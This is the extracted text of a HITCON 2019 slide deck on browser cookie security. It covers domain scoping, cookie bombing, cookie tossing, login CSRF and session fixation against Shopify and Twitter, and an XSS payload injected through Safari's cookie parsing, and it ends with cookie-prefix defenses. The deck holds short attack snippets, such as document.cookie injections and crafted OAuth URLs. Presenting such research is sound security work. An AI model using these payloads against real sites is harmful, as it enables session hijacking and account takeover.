The Cookie Monster in Our Browsers
The Cookie Monster in Our Browsers
The Cookie Monster in Our Browsers
in your browsers
@filedescriptor
HITCON 2019
@filedescriptor
History
The Dark Age
Basic Syntax
More Attributes
Obsoletes RFC 2109
Cookie Prefixes
Same-site Cookies
Strict Secure Cookies
RFC 6265
(RFC6265bis) (RFC6265bis) (RFC6265bis)
Attribute Flag
👀 👀
sub.example.com sub.of.sub.example.com
Subdomains to subdomains
sub.example.com
Set-Cookie: foo=bar; domain=.example.com
👀 👀
example.com sub.of.sub.example.com
Current domain
sub.example.com
Set-Cookie: foo=bar;
👀 👀
example.com sub.of.sub.example.com
Dot or no Dot?
• They have no difference (old RFC vs new RFC style)
https://example.com/aaa…aaa https://twitter.com/#b
https://example.com/aaa…aaa https://twitter.com/#c
GET / HTTP/1.1
[...]
} 8kB+
Cookie: ev_redir_a=aaa...aaa;
ev_redir_b=aaa...aaa;
ev_redir_c=aaa...aaa
Shared domains're vulnerable by design
e.g. github.io
Public Suffix List
• Community curated
https://google.com/oauth?client_id=example
https://example.com
iframe.contentWindow.location.href
https://example.com/oauth/callback?code=123
Path & HttpOnly
POST /admin HTTP/1.1
[...]
Cookie: csrf_token=foo; csrf_token=bar
authenticity_token=attacker-known
Reality
Name Value Domain
_twitter_sess original
_twitter_sess attacker’s .twitter.com
authenticity_token=attacker-known
2. The user agent SHOULD sort the cookie-list in the following
order:
authenticity_token=attacker-known
Practical user agent implementations have limits on the number and
size of cookies that they can store. General-use user agents SHOULD
provide each of the following minimum capabilities:
o At least 4096 bytes per cookie (as measured by the sum of the
length of the cookie's name, value, and attributes).
document.cookie='_master_udr=attackers;path=/admin/oauth
Login “CSRF”
https://attacker.myshopify.com/admin/oauth/authorize?client_id=editor
https://script-editor.shopifycloud.com/oauth/callback?code=attackers
Re-login victim
https://victim.myshopify.com/admin/oauth/authorize?client_id=editor
https://script-editor.shopifycloud.com/oauth/callback?code=victims
Session Fixation
Forcing attacker’s session cookie with a subdomain
XSS
https://script-editor.shopifycloud.com
document.cookie='_flow_session=attackers;domain=.shopifycloud.com'
https://victim.myshopify.com/admin/oauth/authorize?client_id=flow
HTTP/1.1 200 OK
[...]
Set-Cookie: realm=hotmail.com;, ClientId='-alert(2)-'
GET / HTTP/1.1
[...] Safari sets 2 cookies
Cookie: realm=hotmail.com; ClientId='-alert(2)-'
window.clientId = ''-alert(2)-'';
CSRF Cookie Injection
Server accepting comma separated cookies
“For backward compatibility, the separator in the
Cookie header is semi-colon (;) everywhere. A
server SHOULD also accept comma (,) as the
separator between cookie-values for future
compatibility.”
__utmz=123456.123456789.11.2.utmcsr=blackfan.ru|utmccn=(referral)|utmcct=/
r/,m5_csrf_tkn=x
m5_csrf_tkn=x
Defense
Cookie Prefixes
• Cookies prefixed with __Host- cannot have Domain
attribute
Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.
Alternative Proxies: